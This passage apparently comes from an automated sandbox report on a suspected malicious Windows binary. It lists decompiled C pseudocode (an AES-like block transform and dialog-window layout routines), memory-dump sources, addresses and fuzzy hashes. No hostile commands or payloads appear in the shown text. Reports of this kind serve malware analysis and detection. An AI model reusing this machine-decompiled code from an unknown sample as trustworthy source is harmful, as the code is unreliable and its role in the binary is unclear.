                                                                            							0 = 0 | __edi > 0x00000000;
                                                                            							__ecx = (__edi > 0) * 2 != 1;
                                                                            							if((__edi > 0) * 2 != 1) {
                                                                            								goto L1;
                                                                            							}
                                                                            							goto L8;
                                                                            						}
                                                                            						0 = 0 | __edi > 0x00000000;
                                                                            						__ecx = (__edi > 0) * 2 != 1;
                                                                            						if((__edi > 0) * 2 != 1) {
                                                                            							goto L1;
                                                                            						}
                                                                            						goto L6;
                                                                            					}
                                                                            					0 = 0 | __edi > 0x00000000;
                                                                            					__ecx = (__edi > 0) * 2 != 1;
                                                                            					if((__edi > 0) * 2 != 1) {
                                                                            						goto L1;
                                                                            					}
                                                                            					goto L4;
                                                                            				}
                                                                            				L1:
                                                                            				_t184 = _t231;
                                                                            				return _t184;
                                                                            			}






























                                                                            0x001afdc7
                                                                            0x001afdd0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001afdd0
                                                                            0x001afda5
                                                                            0x001afdae
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001afdae
                                                                            0x001afd83
                                                                            0x001afd8c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001afce6
                                                                            0x001afce6
                                                                            0x001afced
                                                                            0x001afcef
                                                                            0x001afd03
                                                                            0x001afd03
                                                                            0x001afd0b
                                                                            0x001afd0d
                                                                            0x001afd21
                                                                            0x001afd21
                                                                            0x001afd29
                                                                            0x001afd2b
                                                                            0x001afd3f
                                                                            0x001afd3f
                                                                            0x001afd47
                                                                            0x001afd49
                                                                            0x001afd52
                                                                            0x001afd52
                                                                            0x00000000
                                                                            0x001afd49
                                                                            0x001afd31
                                                                            0x001afd34
                                                                            0x001afd3d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001afd3d
                                                                            0x001afd13
                                                                            0x001afd16
                                                                            0x001afd1f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001afd1f
                                                                            0x001afcf5
                                                                            0x001afcf8
                                                                            0x001afd01
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001afd01
                                                                            0x001afcd6
                                                                            0x001afcd6
                                                                            0x001b0ac7

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                            • Instruction ID: 915c3ba94860e417efbb54e85c517f5d1e9d81441a4f0014bbc8a94789f8f13a
                                                                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                            • Instruction Fuzzy Hash: A4C1D77A2050970ADF2E467AC53453EFAA16AA37B131A077DD8B3CB0D5FF20C529D620
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                            • Instruction ID: e3352d91267875c2763cdd73448c4505c2e3b274307eba5fadeeddaf5a56f9f0
                                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                            • Instruction Fuzzy Hash: 1AC1857A2051570ADF2D467AC53453EBBA16AA37B131A077DD8B3CB1C9FF20C52AD620
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0019DF12(void* __ebx, intOrPtr __ecx, void* __esi) {
                                                                            				void* _t222;
                                                                            				signed int _t229;
                                                                            				signed char _t253;
                                                                            				signed int _t301;
                                                                            				signed int* _t304;
                                                                            				signed int* _t309;
                                                                            				unsigned int _t313;
                                                                            				signed char _t348;
                                                                            				unsigned int _t350;
                                                                            				signed int _t353;
                                                                            				unsigned int _t356;
                                                                            				signed int* _t359;
                                                                            				signed int _t363;
                                                                            				signed int _t368;
                                                                            				signed int _t372;
                                                                            				signed int _t376;
                                                                            				signed char _t378;
                                                                            				signed int* _t382;
                                                                            				signed int _t388;
                                                                            				signed int _t394;
                                                                            				signed int _t399;
                                                                            				intOrPtr _t400;
                                                                            				signed char _t402;
                                                                            				signed char _t403;
                                                                            				signed char _t404;
                                                                            				unsigned int _t406;
                                                                            				signed int _t409;
                                                                            				signed int _t411;
                                                                            				unsigned int _t412;
                                                                            				unsigned int _t414;
                                                                            				unsigned int _t415;
                                                                            				signed int _t416;
                                                                            				signed int _t421;
                                                                            				void* _t422;
                                                                            				unsigned int _t423;
                                                                            				signed int _t426;
                                                                            				intOrPtr _t429;
                                                                            				signed int* _t430;
                                                                            				void* _t431;
                                                                            				void* _t432;
                                                                            
                                                                            				_t414 =  *(_t431 + 0x64);
                                                                            				_t429 = __ecx;
                                                                            				 *((intOrPtr*)(_t431 + 0x1c)) = __ecx;
                                                                            				if(_t414 != 0) {
                                                                            					_t415 = _t414 >> 4;
                                                                            					 *(_t431 + 0x64) = _t415;
                                                                            					if( *((char*)(__ecx)) == 0) {
                                                                            						 *((intOrPtr*)(_t431 + 0x30)) = __ecx + 8;
                                                                            						E001AEA80(_t431 + 0x54, __ecx + 8, 0x10);
                                                                            						_t432 = _t431 + 0xc;
                                                                            						if(_t415 == 0) {
                                                                            							L13:
                                                                            							return E001AEA80( *((intOrPtr*)(_t432 + 0x30)), _t432 + 0x50, 0x10);
                                                                            						}
                                                                            						_t399 =  *(_t432 + 0x60);
                                                                            						 *(_t432 + 0x1c) = _t399 + 8;
                                                                            						_t229 =  *(_t432 + 0x70);
                                                                            						_t400 = _t399 - _t229;
                                                                            						 *((intOrPtr*)(_t432 + 0x2c)) = _t400;
                                                                            						_t359 = _t229 + 8;
                                                                            						 *(_t432 + 0x20) = _t359;
                                                                            						do {
                                                                            							_t421 =  *(_t429 + 4);
                                                                            							 *(_t432 + 0x28) = _t359 + _t400 + 0xfffffff8;
                                                                            							E0019DEDF(_t432 + 0x4c, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
                                                                            							_t402 =  *(_t432 + 0x44);
                                                                            							 *(_t432 + 0x68) =  *(0x1d5350 + (_t402 & 0x000000ff) * 4) ^  *(0x1d5f50 + ( *(_t432 + 0x4b) & 0x000000ff) * 4) ^  *(0x1d5b50 + ( *(_t432 + 0x4e) & 0x000000ff) * 4);
                                                                            							_t348 =  *(_t432 + 0x50);
                                                                            							_t363 =  *(_t432 + 0x68) ^  *(0x1d5750 + (_t348 & 0x000000ff) * 4);
                                                                            							 *(_t432 + 0x68) = _t363;
                                                                            							 *(_t432 + 0x34) = _t363;
                                                                            							_t403 =  *(_t432 + 0x48);
                                                                            							_t368 =  *(0x1d5750 + (_t402 & 0x000000ff) * 4) ^  *(0x1d5350 + (_t403 & 0x000000ff) * 4) ^  *(0x1d5f50 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0x1d5b50 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
                                                                            							 *(_t432 + 0x70) = _t368;
                                                                            							 *(_t432 + 0x38) = _t368;
                                                                            							_t404 =  *(_t432 + 0x4c);
                                                                            							 *(_t432 + 0x10) =  *(0x1d5b50 + ( *(_t432 + 0x46) & 0x000000ff) * 4) ^  *(0x1d5750 + (_t403 & 0x000000ff) * 4);
                                                                            							_t372 =  *(_t432 + 0x10) ^  *(0x1d5350 + (_t404 & 0x000000ff) * 4) ^  *(0x1d5f50 + ( *(_t432 + 0x53) & 0x000000ff) * 4);
                                                                            							 *(_t432 + 0x10) = _t372;
                                                                            							 *(_t432 + 0x3c) = _t372;
                                                                            							 *(_t432 + 0x14) =  *(0x1d5f50 + ( *(_t432 + 0x47) & 0x000000ff) * 4) ^  *(0x1d5b50 + ( *(_t432 + 0x4a) & 0x000000ff) * 4);
                                                                            							_t376 =  *(_t432 + 0x14) ^  *(0x1d5750 + (_t404 & 0x000000ff) * 4) ^  *(0x1d5350 + (_t348 & 0x000000ff) * 4);
                                                                            							_t422 = _t421 - 1;
                                                                            							 *(_t432 + 0x14) = _t376;
                                                                            							 *(_t432 + 0x40) = _t376;
                                                                            							if(_t422 <= 1) {
                                                                            								goto L9;
                                                                            							}
                                                                            							_t416 =  *(_t432 + 0x68);
                                                                            							_t309 = (_t422 + 2 << 4) + _t429;
                                                                            							 *(_t432 + 0x14) = _t309;
                                                                            							_t430 = _t309;
                                                                            							 *((intOrPtr*)(_t432 + 0x18)) = _t422 - 1;
                                                                            							do {
                                                                            								_t411 =  *_t430;
                                                                            								 *(_t432 + 0x68) =  *(_t430 - 8) ^ _t416;
                                                                            								_t430 = _t430 - 0x10;
                                                                            								_t313 = _t430[5] ^ _t376;
                                                                            								_t412 = _t411 ^  *(_t432 + 0x10);
                                                                            								 *(_t432 + 0x14) = _t313;
                                                                            								_t356 = _t430[3] ^  *(_t432 + 0x70);
                                                                            								_t416 =  *(0x1d5750 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1d5b50 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1d5f50 + (_t356 >> 0x18) * 4) ^  *(0x1d5350 + ( *(_t432 + 0x68) & 0x000000ff) * 4);
                                                                            								 *(_t432 + 0x34) = _t416;
                                                                            								 *(_t432 + 0x70) =  *(0x1d5b50 + ( *(_t432 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1d5f50 + (_t412 >> 0x18) * 4);
                                                                            								_t388 =  *(_t432 + 0x70) ^  *(0x1d5750 + ( *(_t432 + 0x68) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1d5350 + (_t356 & 0x000000ff) * 4);
                                                                            								 *(_t432 + 0x70) = _t388;
                                                                            								 *(_t432 + 0x38) = _t388;
                                                                            								_t394 =  *(0x1d5f50 + ( *(_t432 + 0x14) >> 0x18) * 4) ^  *(0x1d5750 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1d5b50 + ( *(_t432 + 0x68) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1d5350 + (_t412 & 0x000000ff) * 4);
                                                                            								 *(_t432 + 0x10) = _t394;
                                                                            								 *(_t432 + 0x3c) = _t394;
                                                                            								_t376 =  *(0x1d5750 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1d5b50 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1d5f50 + ( *(_t432 + 0x68) >> 0x18) * 4) ^  *(0x1d5350 + ( *(_t432 + 0x14) & 0x000000ff) * 4);
                                                                            								_t135 = _t432 + 0x18;
                                                                            								 *_t135 =  *((intOrPtr*)(_t432 + 0x18)) - 1;
                                                                            								 *(_t432 + 0x40) = _t376;
                                                                            							} while ( *_t135 != 0);
                                                                            							_t429 =  *((intOrPtr*)(_t432 + 0x24));
                                                                            							 *(_t432 + 0x68) = _t416;
                                                                            							_t415 =  *(_t432 + 0x6c);
                                                                            							 *(_t432 + 0x14) = _t376;
                                                                            							L9:
                                                                            							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x68);
                                                                            							 *(_t432 + 0x6c) = _t253;
                                                                            							 *(_t432 + 0x44) = _t253;
                                                                            							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x14);
                                                                            							 *(_t432 + 0x34) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0x1d4230));
                                                                            							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x10);
                                                                            							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x70);
                                                                            							 *((char*)(_t432 + 0x35)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0x1d4230));
                                                                            							_t423 =  *(_t432 + 0x6c);
                                                                            							 *(_t432 + 0x4c) = _t406;
                                                                            							 *(_t432 + 0x48) = _t350;
                                                                            							 *((char*)(_t432 + 0x36)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0x1d4230));
                                                                            							 *(_t432 + 0x50) = _t378;
                                                                            							 *((char*)(_t432 + 0x37)) =  *((intOrPtr*)((_t350 >> 0x18) + 0x1d4230));
                                                                            							 *(_t432 + 0x38) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0x1d4230));
                                                                            							 *((char*)(_t432 + 0x39)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0x1d4230));
                                                                            							 *((char*)(_t432 + 0x3a)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0x1d4230));
                                                                            							_t170 = (_t406 >> 0x18) + 0x1d4230; // 0x54cbe9de
                                                                            							 *((char*)(_t432 + 0x3b)) =  *_t170;
                                                                            							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0x1d4230));
                                                                            							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0x1d4230));
                                                                            							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0x1d4230));
                                                                            							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t378 >> 0x18) + 0x1d4230));
                                                                            							 *(_t432 + 0x40) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0x1d4230));
                                                                            							_t409 =  *(_t432 + 0x34) ^  *(_t429 + 0x18);
                                                                            							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0x1d4230));
                                                                            							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0x1d4230));
                                                                            							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t423 >> 0x18) + 0x1d4230));
                                                                            							_t301 =  *(_t432 + 0x40) ^  *(_t429 + 0x24);
                                                                            							_t426 =  *(_t432 + 0x38) ^  *(_t429 + 0x1c);
                                                                            							_t353 =  *(_t432 + 0x3c) ^  *(_t429 + 0x20);
                                                                            							 *(_t432 + 0x6c) = _t301;
                                                                            							if( *((char*)(_t429 + 1)) != 0) {
                                                                            								_t409 = _t409 ^  *(_t432 + 0x54);
                                                                            								_t426 = _t426 ^  *(_t432 + 0x58);
                                                                            								_t353 = _t353 ^  *(_t432 + 0x5c);
                                                                            								 *(_t432 + 0x6c) = _t301 ^  *(_t432 + 0x60);
                                                                            							}
                                                                            							 *(_t432 + 0x54) =  *( *(_t432 + 0x28));
                                                                            							_t304 =  *(_t432 + 0x1c);
                                                                            							 *(_t432 + 0x58) =  *(_t304 - 4);
                                                                            							 *(_t432 + 0x5c) =  *_t304;
                                                                            							 *(_t432 + 0x60) = _t304[1];
                                                                            							_t382 =  *(_t432 + 0x20);
                                                                            							 *(_t432 + 0x1c) =  &(_t304[4]);
                                                                            							 *(_t382 - 8) = _t409;
                                                                            							_t382[1] =  *(_t432 + 0x6c);
                                                                            							_t400 =  *((intOrPtr*)(_t432 + 0x2c));
                                                                            							 *(_t382 - 4) = _t426;
                                                                            							 *_t382 = _t353;
                                                                            							_t359 =  &(_t382[4]);
                                                                            							_t415 = _t415 - 1;
                                                                            							 *(_t432 + 0x20) = _t359;
                                                                            							 *(_t432 + 0x6c) = _t415;
                                                                            						} while (_t415 != 0);
                                                                            						goto L13;
                                                                            					}
                                                                            					return E0019E3D4(__ecx,  *((intOrPtr*)(_t431 + 0x68)), _t415,  *((intOrPtr*)(_t431 + 0x68)));
                                                                            				}
                                                                            				return _t222;
                                                                            			}












































                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bd1ba6c5f392897ab3b860d8c95ca73745990a7969ca6d53f70318bdd8a30e1b
                                                                            • Instruction ID: 1db6b47408a602768373cdc29e20c8529ddf1372404bf06e0806b818c7afd81f
                                                                            • Opcode Fuzzy Hash: bd1ba6c5f392897ab3b860d8c95ca73745990a7969ca6d53f70318bdd8a30e1b
                                                                            • Instruction Fuzzy Hash: 40E1367551A3808FC304CF29E89086ABBF1BB8A305F89095FF9D587396C335E955CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
                                                                            • Instruction ID: 99b27ca630677af23c9e90568cb74bf1f342f49d77cdd8a66f5d3da33ff680fa
                                                                            • Opcode Fuzzy Hash: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
                                                                            • Instruction Fuzzy Hash: 73918FF42043458BDB28EF68D895BBE73C5AF62304F540A2DF5A787282DB74E648C752
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1913bd64f26aac9cfa2f663e18ba509569766f0696d194a7c1a53adaca9f3dea
                                                                            • Instruction ID: 9277d063f858fe493977ba40b0eb1d2edf145be5bc4dd962042163fb5bcf741f
                                                                            • Opcode Fuzzy Hash: 1913bd64f26aac9cfa2f663e18ba509569766f0696d194a7c1a53adaca9f3dea
                                                                            • Instruction Fuzzy Hash: 4E614771E0070867DE38A9288891BFE63B8DF55740F10851EF6A3DB2C3D711EFA68256
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
                                                                            • Instruction ID: 9bcc419ff397425734288ee2e8231b7aafa1b172b6b0842beae3c70ab49dcacd
                                                                            • Opcode Fuzzy Hash: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
                                                                            • Instruction Fuzzy Hash: 487148753043464BDB34DF68C8D0BBD7791ABA2304F14492DF9D68B282DBB49A89C762
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                            • Instruction ID: 910d7d896e8262a01b75460df016e75a16e4d354ff904d2914b7014f46574af7
                                                                            • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                            • Instruction Fuzzy Hash: 66518E31600A8457DF3855EC85A6BFFA7C99B16740F98091AE872CB282CB15EF75C361
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c8e355695c3eef1757d21f8da3be972c2a5e31d062b7698fdac0661cff4f10ee
                                                                            • Instruction ID: 142fd21fdd1a6d65c22d6378a5d89c39bdc29c7a3773b8eacec63b53c51937dc
                                                                            • Opcode Fuzzy Hash: c8e355695c3eef1757d21f8da3be972c2a5e31d062b7698fdac0661cff4f10ee
                                                                            • Instruction Fuzzy Hash: 2F81B19211B2E4AECB0A8F3D38A02E53FA25773341B1D44FBC4C987AA7C17655D8C761
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cb39e829aafaef9f2e806d81df2dbd44cf3b5e22230e3ebc8fc1f5f5eb0825e4
                                                                            • Instruction ID: d176c20cbc282d40ccec1c8647290956f21724d70f72dfa5430c3a5c68aeb510
                                                                            • Opcode Fuzzy Hash: cb39e829aafaef9f2e806d81df2dbd44cf3b5e22230e3ebc8fc1f5f5eb0825e4
                                                                            • Instruction Fuzzy Hash: 6251D43590C3914FCB12CF25D18446EBFE1AFAA318F5A489EE4D54B252D231E689CB53
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f7d562ddd36fd66a8c99a66b0e650dd6a9197c5a6c47287b97ee4214c0ed9a1c
                                                                            • Instruction ID: 2ee86f0c112ddcbc42cb1282aef7ebe82ed261e99591d83a48487c040f587ff8
                                                                            • Opcode Fuzzy Hash: f7d562ddd36fd66a8c99a66b0e650dd6a9197c5a6c47287b97ee4214c0ed9a1c
                                                                            • Instruction Fuzzy Hash: BA5126B1A083029FC748CF19D49059AF7E1FF88314F054A2EE899E7740DB34E959CB96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
                                                                            • Instruction ID: ca02e692ddc4ce8356edead9d5f2fc93e8b17d619fbcf28ce5e8a4fc87866043
                                                                            • Opcode Fuzzy Hash: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
                                                                            • Instruction Fuzzy Hash: 3431D2B56047158FCB14DE28C85126AFBD0FB9A300F54492DF9D9D7741C778EA0ACBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: efe8f01587c29341b778a277d08c93f31fe1cbfa12441091232d12269779c87a
                                                                            • Instruction ID: b3eefc39634833815d7a78feb582b3e2d1d93146be3715f6646aa376010271d0
                                                                            • Opcode Fuzzy Hash: efe8f01587c29341b778a277d08c93f31fe1cbfa12441091232d12269779c87a
                                                                            • Instruction Fuzzy Hash: 0321AA31A201614BCF09CF6DDCA087A7B92A74630134A812FEE46DF791C635E965C7E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                            			E0019D70B(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
                                                                            				struct HWND__* _v8;
                                                                            				short _v2048;
                                                                            				char _v2208;
                                                                            				char _v2288;
                                                                            				signed int _v2292;
                                                                            				char _v2300;
                                                                            				intOrPtr _v2304;
                                                                            				struct tagRECT _v2320;
                                                                            				intOrPtr _v2324;
                                                                            				intOrPtr _v2336;
                                                                            				struct tagRECT _v2352;
                                                                            				struct tagRECT _v2368;
                                                                            				signed int _v2376;
                                                                            				char _v2377;
                                                                            				intOrPtr _v2384;
                                                                            				intOrPtr _v2393;
                                                                            				void* __ebx;
                                                                            				void* __esi;
                                                                            				signed int _t96;
                                                                            				signed int _t104;
                                                                            				struct HWND__* _t106;
                                                                            				signed int _t119;
                                                                            				signed int _t134;
                                                                            				void* _t150;
                                                                            				void* _t155;
                                                                            				char _t156;
                                                                            				void* _t157;
                                                                            				signed int _t158;
                                                                            				intOrPtr _t160;
                                                                            				void* _t163;
                                                                            				void* _t169;
                                                                            				long _t170;
                                                                            				signed int _t174;
                                                                            				signed int _t185;
                                                                            				struct HWND__* _t186;
                                                                            				struct HWND__* _t187;
                                                                            				void* _t188;
                                                                            				void* _t191;
                                                                            				signed int _t192;
                                                                            				long _t193;
                                                                            				void* _t200;
                                                                            				int* _t201;
                                                                            				struct HWND__* _t202;
                                                                            				void* _t204;
                                                                            				void* _t205;
                                                                            				void* _t207;
                                                                            				void* _t209;
                                                                            				void* _t213;
                                                                            
                                                                            				_t202 = __ecx;
                                                                            				_v2368.bottom = __ecx;
                                                                            				E00193E41( &_v2208, 0x50, L"$%s:", _a8);
                                                                            				_t207 =  &_v2368 + 0x10;
                                                                            				E001A11FA( &_v2208,  &_v2288, 0x50);
                                                                            				_t96 = E001B2BB0( &_v2300);
                                                                            				_t186 = _v8;
                                                                            				_t155 = 0;
                                                                            				_v2376 = _t96;
                                                                            				_t209 =  *0x1cd5f4 - _t155; // 0x63
                                                                            				if(_t209 <= 0) {
                                                                            					L8:
                                                                            					_t156 = E0019CD7D(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
                                                                            					_v2377 = _t156;
                                                                            					GetWindowRect(_t186,  &_v2352);
                                                                            					GetClientRect(_t186,  &(_v2320.top));
                                                                            					_t169 = _v2352.right - _v2352.left + 1;
                                                                            					_t104 = _v2320.bottom;
                                                                            					_t191 = _v2352.bottom - _v2352.top + 1;
                                                                            					_v2368.right = 0x64;
                                                                            					_t204 = _t191 - _v2304;
                                                                            					_v2368.bottom = _t169 - _t104;
                                                                            					if(_t156 == 0) {
                                                                            						L15:
                                                                            						_t221 = _a12;
                                                                            						if(_a12 == 0 && E0019CE00(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
                                                                            							SetWindowTextW(_t186,  &_v2048);
                                                                            						}
                                                                            						L18:
                                                                            						_t205 = _t204 - GetSystemMetrics(8);
                                                                            						_t106 = GetWindow(_t186, 5);
                                                                            						_t187 = _t106;
                                                                            						_v2368.bottom = _t187;
                                                                            						if(_t156 == 0) {
                                                                            							L24:
                                                                            							return _t106;
                                                                            						}
                                                                            						_t157 = 0;
                                                                            						while(_t187 != 0) {
                                                                            							__eflags = _t157 - 0x200;
                                                                            							if(_t157 >= 0x200) {
                                                                            								goto L24;
                                                                            							}
                                                                            							GetWindowRect(_t187,  &_v2320);
                                                                            							_t170 = _v2320.top.left;
                                                                            							_t192 = 0x64;
                                                                            							asm("cdq");
                                                                            							_t193 = _v2320.left;
                                                                            							asm("cdq");
                                                                            							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
                                                                            							asm("cdq");
                                                                            							_t174 = 0x64;
